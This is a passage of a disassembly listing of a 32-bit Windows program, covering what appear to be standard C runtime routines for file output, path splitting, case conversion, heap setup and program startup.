call sub_432431
push edi
push offset asc_450368 ; ": "
push edi
call sub_432431
add esp, 1Ch
loc_42BE5F: ; CODE XREF: sub_42BE29+12�j
; sub_42BE29+17�j
call sub_42F049
cmp dword ptr [eax], 0
jl short loc_42BE81
call sub_42F049
mov eax, [eax]
cmp eax, dword_453974
jge short loc_42BE81
call sub_42F049
mov eax, [eax]
jmp short loc_42BE86
; ---------------------------------------------------------------------------
loc_42BE81: ; CODE XREF: sub_42BE29+3E�j
; sub_42BE29+4D�j
mov eax, dword_453974
loc_42BE86: ; CODE XREF: sub_42BE29+56�j
mov esi, off_4538C4[eax*4]
push esi
call sub_4292D0
push eax
push esi
push edi
call sub_432431
push 1
push offset asc_440D78 ; "\n"
push edi
call sub_432431
push edi
call sub_4323AA
add esp, 20h
pop edi
pop esi
retn
sub_42BE29 endp
; =============== S U B R O U T I N E =======================================
sub_42BEB4 proc near ; CODE XREF: sub_42BEC0�j
push offset off_450EA0
call sub_4325ED
pop ecx
retn
sub_42BEB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42BEC0 proc near ; CODE XREF: sub_41F02F+3B6�p
jmp sub_42BEB4
sub_42BEC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42BEC5 proc near ; CODE XREF: sub_41F7B0+2F1�p
; sub_41FB92+154�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4292D0
cmp eax, 1
pop ecx
jb short loc_42BF00
cmp byte ptr [ebx+1], 3Ah
jnz short loc_42BF00
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_42BEFC
push 2
push ebx
push esi
call sub_4329EC
add esp, 0Ch
and byte ptr [esi+2], 0
loc_42BEFC: ; CODE XREF: sub_42BEC5+25�j
inc ebx
inc ebx
jmp short loc_42BF0A
; ---------------------------------------------------------------------------
loc_42BF00: ; CODE XREF: sub_42BEC5+18�j
; sub_42BEC5+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_42BF0A
and byte ptr [eax], 0
loc_42BF0A: ; CODE XREF: sub_42BEC5+39�j
; sub_42BEC5+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_42BF82
loc_42BF1D: ; CODE XREF: sub_42BEC5+87�j
mov cl, [eax]
movzx edx, cl
test byte_676DA1[edx], 4
jz short loc_42BF2E
inc eax
jmp short loc_42BF48
; ---------------------------------------------------------------------------
loc_42BF2E: ; CODE XREF: sub_42BEC5+64�j
cmp cl, 2Fh
jz short loc_42BF42
cmp cl, 5Ch
jz short loc_42BF42
cmp cl, 2Eh
jnz short loc_42BF48
mov [ebp+var_4], eax
jmp short loc_42BF48
; ---------------------------------------------------------------------------
loc_42BF42: ; CODE XREF: sub_42BEC5+6C�j
; sub_42BEC5+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_42BF48: ; CODE XREF: sub_42BEC5+67�j
; sub_42BEC5+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_42BF1D
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_42BF82
cmp [ebp+arg_8], 0
jz short loc_42BF7D
sub edi, ebx
cmp edi, esi
jb short loc_42BF66
mov edi, esi
loc_42BF66: ; CODE XREF: sub_42BEC5+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_4329EC
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_42BF7D: ; CODE XREF: sub_42BEC5+97�j
mov ebx, [ebp+arg_4]
jmp short loc_42BF8C
; ---------------------------------------------------------------------------
loc_42BF82: ; CODE XREF: sub_42BEC5+56�j
; sub_42BEC5+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_42BF8C
and byte ptr [ecx], 0
loc_42BF8C: ; CODE XREF: sub_42BEC5+BB�j
; sub_42BEC5+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_42BFDF
cmp edi, ebx
jb short loc_42BFDF
cmp [ebp+arg_C], 0
jz short loc_42BFBC
sub edi, ebx
cmp edi, esi
jb short loc_42BFA5
mov edi, esi
loc_42BFA5: ; CODE XREF: sub_42BEC5+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_4329EC
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_42BFBC: ; CODE XREF: sub_42BEC5+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_42C007
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_42BFCC
mov esi, eax
loc_42BFCC: ; CODE XREF: sub_42BEC5+103�j
push esi
push [ebp+var_4]
push edi
call sub_4329EC
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_42C007
; ---------------------------------------------------------------------------
loc_42BFDF: ; CODE XREF: sub_42BEC5+CC�j
; sub_42BEC5+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_42BFFD
sub eax, ebx
cmp eax, esi
jnb short loc_42BFEE
mov esi, eax
loc_42BFEE: ; CODE XREF: sub_42BEC5+125�j
push esi
push ebx
push edi
call sub_4329EC
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_42BFFD: ; CODE XREF: sub_42BEC5+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_42C007
and byte ptr [eax], 0
loc_42C007: ; CODE XREF: sub_42BEC5+FC�j
; sub_42BEC5+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_42BEC5 endp
; =============== S U B R O U T I N E =======================================
sub_42C00C proc near ; CODE XREF: sub_41FB92+184�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
push esi
call sub_42C104
push esi
call sub_432034
mov edi, eax
lea eax, [esp+14h+arg_8]
push eax
push [esp+18h+arg_4]
push esi
call sub_42DBAD
push esi
push edi
mov ebx, eax
call sub_4320C1
push esi
call sub_42C156
add esp, 20h
mov eax, ebx
pop edi
pop esi
pop ebx
retn
sub_42C00C endp
; =============== S U B R O U T I N E =======================================
sub_42C048 proc near ; DATA XREF: .text:0043A01C�o
mov eax, dword_678000
push esi
push 14h
test eax, eax
pop esi
jnz short loc_42C05C
mov eax, 200h
jmp short loc_42C062
; ---------------------------------------------------------------------------
loc_42C05C: ; CODE XREF: sub_42C048+B�j
cmp eax, esi
jge short loc_42C067
mov eax, esi
loc_42C062: ; CODE XREF: sub_42C048+12�j
mov dword_678000, eax
loc_42C067: ; CODE XREF: sub_42C048+16�j
push 4
push eax
call sub_42B2CA
pop ecx
mov dword_676FEC, eax
test eax, eax
pop ecx
jnz short loc_42C09B
push 4
push esi
mov dword_678000, esi
call sub_42B2CA
pop ecx
mov dword_676FEC, eax
test eax, eax
pop ecx
jnz short loc_42C09B
push 1Ah
call sub_42C5AC
pop ecx
loc_42C09B: ; CODE XREF: sub_42C048+30�j
; sub_42C048+49�j
xor ecx, ecx
mov eax, offset off_450EA0
loc_42C0A2: ; CODE XREF: sub_42C048+6E�j
mov edx, dword_676FEC
mov [ecx+edx], eax
add eax, 20h
add ecx, 4
cmp eax, offset off_451120
jl short loc_42C0A2
xor ecx, ecx
mov edx, offset dword_450EB0
loc_42C0BF: ; CODE XREF: sub_42C048+A4�j
mov esi, ecx
mov eax, ecx
sar esi, 5
and eax, 1Fh
mov esi, dword_676EC0[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_42C0DF
test eax, eax
jnz short loc_42C0E2
loc_42C0DF: ; CODE XREF: sub_42C048+91�j
or dword ptr [edx], 0FFFFFFFFh
loc_42C0E2: ; CODE XREF: sub_42C048+95�j
add edx, 20h
inc ecx
cmp edx, offset dword_450F10
jl short loc_42C0BF
pop esi
retn
sub_42C048 endp
; =============== S U B R O U T I N E =======================================
sub_42C0F0 proc near ; DATA XREF: .text:0043A030�o
call sub_42F265
cmp byte_6769E4, 0
jz short locret_42C103
jmp sub_432A86
; ---------------------------------------------------------------------------
locret_42C103: ; CODE XREF: sub_42C0F0+C�j
retn
sub_42C0F0 endp
; =============== S U B R O U T I N E =======================================
sub_42C104 proc near ; CODE XREF: sub_42A03B+16�p
; sub_42A0B8+7�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_450EA0
cmp eax, ecx
jb short loc_42C128
cmp eax, offset dword_451100
ja short loc_42C128
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_42DA1F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C128: ; CODE XREF: sub_42C104+B�j
; sub_42C104+12�j
add eax, 20h
push eax
call dword_4370C8 ; RtlEnterCriticalSection
retn
sub_42C104 endp
; =============== S U B R O U T I N E =======================================
sub_42C133 proc near ; CODE XREF: sub_42BDE8+B�p
; sub_42F26E+2D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_42C147
add eax, 1Ch
push eax
call sub_42DA1F
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C147: ; CODE XREF: sub_42C133+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_4370C8 ; RtlEnterCriticalSection
retn
sub_42C133 endp
; =============== S U B R O U T I N E =======================================
sub_42C156 proc near ; CODE XREF: sub_42A03B+24�p
; sub_42A0B8+22�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_450EA0
cmp eax, ecx
jb short loc_42C17A
cmp eax, offset dword_451100
ja short loc_42C17A
sub eax, ecx
sar eax, 5
add eax, 1Ch
push eax
call sub_42DA80
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C17A: ; CODE XREF: sub_42C156+B�j
; sub_42C156+12�j
add eax, 20h
push eax
call dword_437160 ; RtlLeaveCriticalSection
retn
sub_42C156 endp
; =============== S U B R O U T I N E =======================================
sub_42C185 proc near ; CODE XREF: sub_42BDE8+33�p
; sub_42F26E+7D�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_42C199
add eax, 1Ch
push eax
call sub_42DA80
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C199: ; CODE XREF: sub_42C185+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_437160 ; RtlLeaveCriticalSection
retn
sub_42C185 endp
; =============== S U B R O U T I N E =======================================
sub_42C1A8 proc near ; CODE XREF: sub_41FD79+15D�p
; sub_429D89+12B�p
arg_0 = dword ptr 4
push ebx
xor ebx, ebx
cmp dword_676988, ebx
jnz short loc_42C1C6
mov eax, [esp+4+arg_0]
cmp eax, 61h
jl short loc_42C215
cmp eax, 7Ah
jg short loc_42C215
sub eax, 20h
pop ebx
retn
; ---------------------------------------------------------------------------
loc_42C1C6: ; CODE XREF: sub_42C1A8+9�j
push esi
mov esi, offset dword_676EBC
push edi
push esi
call dword_437220 ; InterlockedIncrement
cmp dword_676EB8, ebx
mov edi, dword_43721C
jz short loc_42C1F0
push esi
call edi ; dword_43721C
push 13h
call sub_42DA1F
pop ecx
push 1
pop ebx
loc_42C1F0: ; CODE XREF: sub_42C1A8+38�j
push [esp+0Ch+arg_0]
call sub_42C217
test ebx, ebx
pop ecx
mov [esp+0Ch+arg_0], eax
jz short loc_42C20C
push 13h
call sub_42DA80
pop ecx
jmp short loc_42C20F
; ---------------------------------------------------------------------------
loc_42C20C: ; CODE XREF: sub_42C1A8+58�j
push esi
call edi ; dword_43721C
loc_42C20F: ; CODE XREF: sub_42C1A8+62�j
mov eax, [esp+0Ch+arg_0]
pop edi
pop esi
loc_42C215: ; CODE XREF: sub_42C1A8+12�j
; sub_42C1A8+17�j
pop ebx
retn
sub_42C1A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C217 proc near ; CODE XREF: sub_42C1A8+4C�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_676988, 0
push ebx
jnz short loc_42C242
mov eax, [ebp+arg_0]
cmp eax, 61h
jl loc_42C2E0
cmp eax, 7Ah
jg loc_42C2E0
sub eax, 20h
jmp loc_42C2E0
; ---------------------------------------------------------------------------
loc_42C242: ; CODE XREF: sub_42C217+C�j
mov ebx, [ebp+arg_0]
cmp ebx, 100h
jge short loc_42C275
cmp dword_4535A4, 1
jle short loc_42C262
push 2
push ebx
call sub_42F05B
pop ecx
pop ecx
jmp short loc_42C26D
; ---------------------------------------------------------------------------
loc_42C262: ; CODE XREF: sub_42C217+3D�j
mov eax, off_453398
mov al, [eax+ebx*2]
and eax, 2
loc_42C26D: ; CODE XREF: sub_42C217+49�j
test eax, eax
jnz short loc_42C275
loc_42C271: ; CODE XREF: sub_42C217+AF�j
mov eax, ebx
jmp short loc_42C2E0
; ---------------------------------------------------------------------------
loc_42C275: ; CODE XREF: sub_42C217+34�j
; sub_42C217+58�j
mov edx, off_453398
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42C298
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
push 2
jmp short loc_42C2A1
; ---------------------------------------------------------------------------
loc_42C298: ; CODE XREF: sub_42C217+71�j
and byte ptr [ebp+arg_0+1], 0
mov byte ptr [ebp+arg_0], bl
push 1
loc_42C2A1: ; CODE XREF: sub_42C217+7F�j
pop eax
lea ecx, [ebp+var_4]
push 1
push 0
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword_676988
call sub_430CCF
add esp, 20h
test eax, eax
jz short loc_42C271
cmp eax, 1
jnz short loc_42C2D3
movzx eax, [ebp+var_4]
jmp short loc_42C2E0
; ---------------------------------------------------------------------------
loc_42C2D3: ; CODE XREF: sub_42C217+B4�j
movzx eax, [ebp+var_3]
movzx ecx, [ebp+var_4]
shl eax, 8
or eax, ecx
loc_42C2E0: ; CODE XREF: sub_42C217+14�j
; sub_42C217+1D�j ...
pop ebx
leave
retn
sub_42C217 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C2E3 proc near ; CODE XREF: sub_420399+536�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push [ebp+arg_C]
call sub_42C104
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_42C312
push [ebp+arg_C]
mov esi, eax
call sub_42C156
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_42C2E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C312 proc near ; CODE XREF: sub_42C2E3+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
test edi, edi
mov [ebp+arg_0], eax
mov ebx, edi
jnz short loc_42C336
xor eax, eax
jmp loc_42C403
; ---------------------------------------------------------------------------
loc_42C336: ; CODE XREF: sub_42C312+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_42C349
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_42C350
; ---------------------------------------------------------------------------
loc_42C349: ; CODE XREF: sub_42C312+2D�j
mov [ebp+arg_C], 1000h
loc_42C350: ; CODE XREF: sub_42C312+35�j
; sub_42C312+E8�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_42C384
mov eax, [esi+4]
test eax, eax
jz short loc_42C384
cmp ebx, eax
mov edi, ebx
jb short loc_42C36A
mov edi, eax
loc_42C36A: ; CODE XREF: sub_42C312+54�j
push edi
push [ebp+arg_0]
push dword ptr [esi]
call sub_429350
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+arg_0], edi
jmp short loc_42C3CA
; ---------------------------------------------------------------------------
loc_42C384: ; CODE XREF: sub_42C312+47�j
; sub_42C312+4E�j
cmp ebx, [ebp+arg_C]
jb short loc_42C3CF
test ecx, ecx
jz short loc_42C398
push esi
call sub_42F209
test eax, eax
pop ecx
jnz short loc_42C411
loc_42C398: ; CODE XREF: sub_42C312+79�j
cmp [ebp+arg_C], 0
jz short loc_42C3AB
mov eax, ebx
xor edx, edx
div [ebp+arg_C]
mov edi, ebx
sub edi, edx
jmp short loc_42C3AD
; ---------------------------------------------------------------------------
loc_42C3AB: ; CODE XREF: sub_42C312+8A�j
mov edi, ebx
loc_42C3AD: ; CODE XREF: sub_42C312+97�j
push edi
push [ebp+arg_0]
push dword ptr [esi+10h]
call sub_4323CC
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_42C408
add [ebp+arg_0], eax
sub ebx, eax
cmp eax, edi
jb short loc_42C408
loc_42C3CA: ; CODE XREF: sub_42C312+70�j
mov edi, [ebp+var_4]
jmp short loc_42C3F8
; ---------------------------------------------------------------------------
loc_42C3CF: ; CODE XREF: sub_42C312+75�j
mov eax, [ebp+arg_0]
push esi
movsx eax, byte ptr [eax]
push eax
call sub_42DA95
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_42C411
inc [ebp+arg_0]
mov eax, [esi+18h]
dec ebx
mov [ebp+arg_C], eax
test eax, eax
jg short loc_42C3F8
mov [ebp+arg_C], 1
loc_42C3F8: ; CODE XREF: sub_42C312+BB�j
; sub_42C312+DD�j
test ebx, ebx
jnz loc_42C350
mov eax, [ebp+arg_8]
loc_42C403: ; CODE XREF: sub_42C312+1F�j
; sub_42C312+108�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42C408: ; CODE XREF: sub_42C312+AD�j
; sub_42C312+B6�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp+var_4]
jmp short loc_42C413
; ---------------------------------------------------------------------------
loc_42C411: ; CODE XREF: sub_42C312+84�j
; sub_42C312+CF�j
mov eax, edi
loc_42C413: ; CODE XREF: sub_42C312+FD�j
sub eax, ebx
xor edx, edx
div [ebp+arg_4]
jmp short loc_42C403
sub_42C312 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_42C420 proc near ; CODE XREF: sub_42251B+17F�p
; sub_42E525+7F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_42C439
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_42C439: ; CODE XREF: sub_42C420+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_42C420 endp
; =============== S U B R O U T I N E =======================================
sub_42C454 proc near ; CODE XREF: sub_426698+1AF�p
arg_0 = dword ptr 4
cmp dword_4535A4, 1
jle short loc_42C46B
push 4
push [esp+4+arg_0]
call sub_42F05B
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C46B: ; CODE XREF: sub_42C454+7�j
mov eax, [esp+arg_0]
mov ecx, off_453398
mov al, [ecx+eax*2]
and eax, 4
retn
sub_42C454 endp
; =============== S U B R O U T I N E =======================================
sub_42C47C proc near ; CODE XREF: sub_42E525+76�p
; sub_42E525+88�p ...
arg_0 = dword ptr 4
cmp dword_4535A4, 1
jle short loc_42C493
push 8
push [esp+4+arg_0]
call sub_42F05B
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_42C493: ; CODE XREF: sub_42C47C+7�j
mov eax, [esp+arg_0]
mov ecx, off_453398
mov al, [ecx+eax*2]
and eax, 8
retn
sub_42C47C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4374C0
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_43723C ; GetVersion
xor edx, edx
mov dl, ah
mov dword_6769BC, edx
mov ecx, eax
and ecx, 0FFh
mov dword_6769B8, ecx
shl ecx, 8
add ecx, edx
mov dword_6769B4, ecx
shr eax, 10h
mov dword ptr byte_6769B0, eax
push 1
call sub_42C785
pop ecx
test eax, eax
jnz short loc_42C50F
push 1Ch
call sub_42C5D1
pop ecx
loc_42C50F: ; CODE XREF: .text:0042C505�j
call sub_42E3B7
test eax, eax
jnz short loc_42C520
push 10h
call sub_42C5D1
pop ecx
loc_42C520: ; CODE XREF: .text:0042C516�j
xor esi, esi
mov [ebp-4], esi
call sub_42F62C
call dword_437238 ; GetCommandLineA
mov dword_676FE8, eax
call sub_432E65
mov dword_676904, eax
call sub_432C18
call sub_432B5F
call sub_430A37
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_437234 ; GetStartupInfoA
call sub_432B07
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_42C56F
movzx eax, word ptr [ebp-2Ch]
jmp short loc_42C572
; ---------------------------------------------------------------------------
loc_42C56F: ; CODE XREF: .text:0042C567�j
push 0Ah
pop eax
loc_42C572: ; CODE XREF: .text:0042C56D�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_437070 ; GetModuleHandleA
push eax
call sub_418D49
mov [ebp-60h], eax
push eax
call sub_430A64
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_430B57
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_430A75
; =============== S U B R O U T I N E =======================================
sub_42C5AC proc near ; CODE XREF: sub_42AB28+3C�p
; sub_42ABBB+19�p ...
arg_0 = dword ptr 4
cmp dword_67690C, 1
jnz short loc_42C5BA
call sub_432F97
loc_42C5BA: ; CODE XREF: sub_42C5AC+7�j
push [esp+arg_0]
call sub_432FD0
push 0FFh
call off_451120
pop ecx
pop ecx
retn
sub_42C5AC endp
; =============== S U B R O U T I N E =======================================
sub_42C5D1 proc near ; CODE XREF: .text:0042C509�p
; .text:0042C51A�p
arg_0 = dword ptr 4
cmp dword_67690C, 1
jnz short loc_42C5DF
call sub_432F97
loc_42C5DF: ; CODE XREF: sub_42C5D1+7�j
push [esp+arg_0]
call sub_432FD0
pop ecx
push 0FFh
call dword_4370C4 ; ExitProcess
retn
sub_42C5D1 endp
; =============== S U B R O U T I N E =======================================
sub_42C5F5 proc near ; CODE XREF: sub_4296FA+1F�p
; sub_42B2CA+10D�p ...
arg_0 = dword ptr 4
mov eax, dword_676914
test eax, eax
jz short loc_42C60D
push [esp+arg_0]
call eax ; dword_676914
test eax, eax
pop ecx
jz short loc_42C60D
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_42C60D: ; CODE XREF: sub_42C5F5+7�j
; sub_42C5F5+12�j
xor eax, eax
retn
sub_42C5F5 endp
; =============== S U B R O U T I N E =======================================
sub_42C610 proc near ; CODE XREF: sub_42C63D+136�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
and dword ptr [esi], 0
call dword_437070 ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_42C63B
mov ecx, [eax+3Ch]
test ecx, ecx
jz short loc_42C63B
add eax, ecx
mov cl, [eax+1Ah]
mov [esi], cl
mov al, [eax+1Bh]
mov [esi+1], al
loc_42C63B: ; CODE XREF: sub_42C610+15�j
; sub_42C610+1C�j
pop esi
retn
sub_42C610 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42C63D proc near ; CODE XREF: sub_42C785+20�p
var_122C = byte ptr -122Ch
var_19C = byte ptr -19Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_88 = dword ptr -88h
var_4 = byte ptr -4
push ebp
mov ebp, esp
mov eax, 122Ch
call sub_429A90
lea eax, [ebp+var_98]
push ebx
push eax
mov [ebp+var_98], 94h
call dword_437050 ; GetVersionExA
test eax, eax
jz short loc_42C680
cmp [ebp+var_88], 2
jnz short loc_42C680
cmp [ebp+var_94], 5
jb short loc_42C680
push 1
pop eax
jmp loc_42C782
; ---------------------------------------------------------------------------
loc_42C680: ; CODE XREF: sub_42C63D+27�j
; sub_42C63D+30�j ...
lea eax, [ebp+var_122C]
push 1090h
push eax
push offset a__msvcrt_heap_ ; "__MSVCRT_HEAP_SELECT"
call dword_437240 ; GetEnvironmentVariableA
test eax, eax
jz loc_42C76F
xor ebx, ebx
lea ecx, [ebp+var_122C]
cmp [ebp+var_122C], bl
jz short loc_42C6C2
loc_42C6AF: ; CODE XREF: sub_42C63D+83�j
mov al, [ecx]
cmp al, 61h
jl short loc_42C6BD
cmp al, 7Ah
jg short loc_42C6BD
sub al, 20h
mov [ecx], al
loc_42C6BD: ; CODE XREF: sub_42C63D+76�j
; sub_42C63D+7A�j
inc ecx
cmp [ecx], bl
jnz short loc_42C6AF
loc_42C6C2: ; CODE XREF: sub_42C63D+70�j
lea eax, [ebp+var_122C]
push 16h
push eax
push offset a__global_heap_ ; "__GLOBAL_HEAP_SELECTED"
call sub_42B870
add esp, 0Ch
test eax, eax
jnz short loc_42C6E4
lea eax, [ebp+var_122C]
jmp short loc_42C72D
; ---------------------------------------------------------------------------
loc_42C6E4: ; CODE XREF: sub_42C63D+9D�j
lea eax, [ebp+var_19C]
push 104h
push eax
push ebx
call dword_437178 ; GetModuleFileNameA
cmp [ebp+var_19C], bl
lea ecx, [ebp+var_19C]
jz short loc_42C718
loc_42C705: ; CODE XREF: sub_42C63D+D9�j
mov al, [ecx]
cmp al, 61h
jl short loc_42C713
cmp al, 7Ah
jg short loc_42C713
sub al, 20h
mov [ecx], al
loc_42C713: ; CODE XREF: sub_42C63D+CC�j
; sub_42C63D+D0�j
inc ecx
cmp [ecx], bl
jnz short loc_42C705
loc_42C718: ; CODE XREF: sub_42C63D+C6�j
lea eax, [ebp+var_19C]
push eax
lea eax, [ebp+var_122C]
push eax
call sub_42ADD0
pop ecx
pop ecx
loc_42C72D: ; CODE XREF: sub_42C63D+A5�j
cmp eax, ebx
jz short loc_42C76F
push 2Ch
push eax
call sub_42B0D0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_42C76F
inc eax
mov ecx, eax
cmp [eax], bl
jz short loc_42C754
loc_42C746: ; CODE XREF: sub_42C63D+115�j
cmp byte ptr [ecx], 3Bh
jnz short loc_42C74F
mov [ecx], bl
jmp short loc_42C750
; ---------------------------------------------------------------------------
loc_42C74F: ; CODE XREF: sub_42C63D+10C�j
inc ecx
loc_42C750: ; CODE XREF: sub_42C63D+110�j
cmp [ecx], bl
jnz short loc_42C746
loc_42C754: ; CODE XREF: sub_42C63D+107�j
push 0Ah
push ebx
push eax
call sub_429D72
add esp, 0Ch
cmp eax, 2
jz short loc_42C782
cmp eax, 3
jz short loc_42C782
cmp eax, 1
jz short loc_42C782
loc_42C76F: ; CODE XREF: sub_42C63D+5C�j
; sub_42C63D+F2�j ...
lea eax, [ebp+var_4]
push eax
call sub_42C610
cmp [ebp+var_4], 6
pop ecx
sbb eax, eax
add eax, 3
loc_42C782: ; CODE XREF: sub_42C63D+3E�j
; sub_42C63D+126�j ...
pop ebx
leave
retn
sub_42C63D endp
; =============== S U B R O U T I N E =======================================
sub_42C785 proc near ; CODE XREF: .text:0042C4FD�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_4371F4 ; HeapCreate
test eax, eax
mov dword_676FE0, eax
jz short loc_42C7DB
call sub_42C63D
cmp eax, 3
mov dword_676FE4, eax
jnz short loc_42C7C1
push 3F8h
call sub_42C7E2
pop ecx
jmp short loc_42C7CB
; ---------------------------------------------------------------------------
loc_42C7C1: ; CODE XREF: sub_42C785+2D�j
cmp eax, 2
jnz short loc_42C7DE
call sub_42D329
loc_42C7CB: ; CODE XREF: sub_42C785+3A�j
test eax, eax
jnz short loc_42C7DE
push dword_676FE0
call dword_4371F8 ; HeapDestroy
loc_42C7DB: ; CODE XREF: sub_42C785+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_42C7DE: ; CODE XREF: sub_42C785+3F�j
; sub_42C785+48�j
push 1
pop eax
retn
sub_42C785 endp
; =============== S U B R O U T I N E =======================================
sub_42C7E2 proc near ; CODE XREF: sub_42C785+34�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_676FE0
call dword_43720C ; RtlAllocateHeap
test eax, eax
mov dword_676FD8, eax
jnz short loc_42C7FF
retn
; ---------------------------------------------------------------------------
loc_42C7FF: ; CODE XREF: sub_42C7E2+1A�j
mov ecx, [esp+arg_0]
and dword_676FD0, 0
and dword_676FD4, 0
push 1
mov dword_676FCC, eax
mov dword_676FDC, ecx
mov dword_676FC4, 10h
pop eax
retn
sub_42C7E2 endp
